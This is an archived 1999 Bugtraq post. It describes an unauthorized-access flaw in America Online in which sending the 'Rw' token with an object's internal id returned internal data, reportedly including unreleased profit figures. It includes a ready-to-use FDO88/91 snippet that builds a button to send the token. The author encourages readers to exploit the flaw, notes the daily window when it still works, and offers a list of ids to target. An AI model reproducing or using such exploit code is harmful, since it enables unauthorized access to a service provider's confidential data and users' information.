OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: America Online Token Hole

America Online Token Hole

Kevin Mack (mackkRPI.EDU)
Thu, 8 Jul 1999 11:18:33 -0400

Normally I wouldn't post things of this nature, but I thought it was important enough. About a year ago, I found out that by sending the "Rw" token to the AOL host while signed on along with the object's internal id as arg, any user could get detailed info about any object on the system. Included in this information is the user who created the object and tons of other information like its current viewrule and AOL url. This was all great for about a week until AOL officially fixed the hole. Normally only internal users are allowed such access for security reasons. Using this exploit, anyone can see headings in AOL's Network Operations Center and look at user count information and AOL mothly profits before they are even released. AOL put all there stuff online...Anyways the hole still exists but is windowed for only about an hour a day. I have no clue why and it seems random... For example yesterday July 7th it existed between 6:30-7:30PM EST. Here is a sample FDO88/91 that will create a button to the send the Rw token w arg and help you exploit..fill the internal id with any number you wish to see..i do have a listing of interesting id if anyone wants to follow this further....and goodluck with the timing...

man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
<
uni_start_stream
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream
>
mat_precise_x < 0 >
mat_precise_y < 226 >
mat_font_sis < small_fonts, 7, normal>
mat_art_id < 1-0-21184 >
mat_bool_default < yes >
man_end_object

comments questions.. mackkrpi.edu

This archive was generated by hypermail 2.0b3 on Thu Jul 08 1999 - 11:40:15 CDT